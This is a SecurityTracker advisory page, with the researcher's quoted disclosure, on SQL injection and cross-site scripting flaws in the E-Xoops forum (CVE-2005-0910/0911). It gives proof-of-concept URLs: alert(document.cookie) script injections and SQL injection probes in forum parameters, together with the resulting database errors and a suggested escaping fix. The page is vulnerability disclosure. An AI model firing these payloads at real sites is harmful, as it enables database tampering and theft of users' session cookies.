Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
|
|
|
|
|
|
|
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
|
|
|
|
Become a Partner and License Our Database or Notification Service
|
|
|
|
|
|
|
|
|
|
|
|
|
|
exoops Input Validation Flaws Permit SQL Injection and Cross-Site Scripting Attacks
|
|
SecurityTracker Alert ID: 1013566
|
|
SecurityTracker URL: http://securitytracker.com/id?1013566
|
|
CVE Reference: CVE-2005-0910
, CVE-2005-0911
(Links to External Site)
|
Updated: Jul 7 2008
|
Original Entry Date: Mar 27 2005
|
Impact: Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of authentication information, Modification of user information
|
Exploit Included: Yes
|
Description: Diabolic Crab reported some input validation vulnerabilities in exoops. A remote user can inject SQL commands. A remote user can also conduct cross-site scripting attacks.
Several scripts do not properly validate user-supplied input in certain parameters. A remote user can supply a specially crafted
URL to execute SQL commands on the underlying database. Some demonstration exploit URLs are provided:
http://[target]/modules/newbb/index.php?viewcat='SQL_INJECTION
http://[target]/modules/sections/index.php?op=viewarticle&artid=9%2c+9%2c+9
A remote user can also create a specially crafted
URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code
will originate from the site running the exoops software and will run in the security context of that site. As a result, the code
will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data
recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
Some demonstration
exploit URLs are provided:
http://[target]/modules/newbb/viewforum.php?sortname=p.post_time&sort
order=ASC&sortdays=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script
%
3E&forum=25&refresh=Vai
http://[target]/modules/newbb/index.php?viewcat=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
|
Impact: A remote user can execute SQL commands on the underlying database.
A remote user can access the target user's cookies (including
authentication cookies), if any, associated with the site running the exoops software, access data recently submitted by the target
user via web form to the site, or take actions on the site acting as the target user.
|
Solution: No solution was available at the time of this entry.
|
Vendor URL: www.exoops.info/ (Links to External Site)
|
Cause: Input validation error
|
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
|
Reported By: "Dcrab" <dcrab@hackerscenter.com>
|
Message History:
None.
|
Source Message Contents
|
Date: Sun, 27 Mar 2005 20:33:06 +0530
From: "Dcrab" <dcrab@hackerscenter.com>
Subject: Multiple Sql injection, and multiple XSS vulnerabilities in Easy Community Management System Forum (E-XOOPS)
|
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Dcrab 's Security Advisory
http://icis.digitalparadox.org/~dcrab
http://www.hackerscenter.com/
Severity: High
Title: Multiple Sql injection, and multiple XSS vulnerabilities in
Easy Community Management System Forum (E-XOOPS)
Date: March 28, 2005
Summary:
There are multiple sql injection, xss vulnerabilities in the Easy
Community Management System Forum (E-XOOPS)
Vendor: E-Xoops
Vendor website: www.exoops.info
Proof of Concept Exploits:
http://localhost/modules/newbb/viewforum.php?sortname=p.post_time&sort
order=ASC&sortdays=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%
3E&forum=25&refresh=Vai
Pops cookie
http://localhost/modules/newbb/index.php?viewcat=%22%3E%3Cscript%3Eale
rt(document.cookie)%3C/script%3E
Pops cookie
http://localhost/modules/newbb/index.php?viewcat='SQL_INJECTION
SQL ERROR AND POSSIBLE INJECTION
Error
SELECT f.*, u.uname, u.uid, p.topic_id, p.post_time, p.subject,
p.icon FROM e_xoops_bb_forums f LEFT JOIN e_xoops_bb_posts p ON
p.post_id = f.forum_last_post_id LEFT JOIN e_xoops_users u ON u.uid =
p.uid WHERE f.cat_id = \'SQL_INJECTION ORDER BY f.cat_id,
f.forum_name
http://localhost/modules/sections/index.php?op=viewarticle&artid=9%2c+
9%2c+9
SQL ERROR AND POSSIBLE INJECTION
Errore Numero: 2 [Attenzione]
Message errore: mysql_fetch_row(): supplied argument is not a valid
MySQL result resource
In File: /var/www/*************/09/class/database/mysql.php
On Line: 151
Errore Numero: 2 [Attenzione]
Message errore: mysql_fetch_row(): supplied argument is not a valid
MySQL result resource
In File: /var/www/*************/09/class/database/mysql.php
On Line: 151
Possible fix: The usage of htmlspeacialchars(),
mysql_escape_string(), mysql_real_escape_string() and other functions
for input validation before passing user input to the mysql database,
or before echoing data on the screen, would solve these problems.
Author:
These vulnerabilties have been found and released by Diabolic Crab,
Email: dcrab[AT|NOSPAM]hackersenter[DOT|NOSPAM]com, please feel free
to contact me regarding these vulnerabilities. You can find me at,
http://www.hackerscenter.com or
http://icis.digitalparadox.org/~dcrab. Lookout for my soon to come
out book on Secure coding with php.
-----BEGIN PGP SIGNATURE-----
Version: PGP 8.1 - not licensed for commercial use: www.pgp.com
iQA/AwUBQkbLJCZV5e8av/DUEQJDWACfc/2aBR87DepZ2jVVTok2Pfww1cMAn0J3
HI/E6boKXH3OlGAch+b4z0me
=Yl6f
-----END PGP SIGNATURE-----
|
|
Go to the Top of This SecurityTracker Archive Page
|
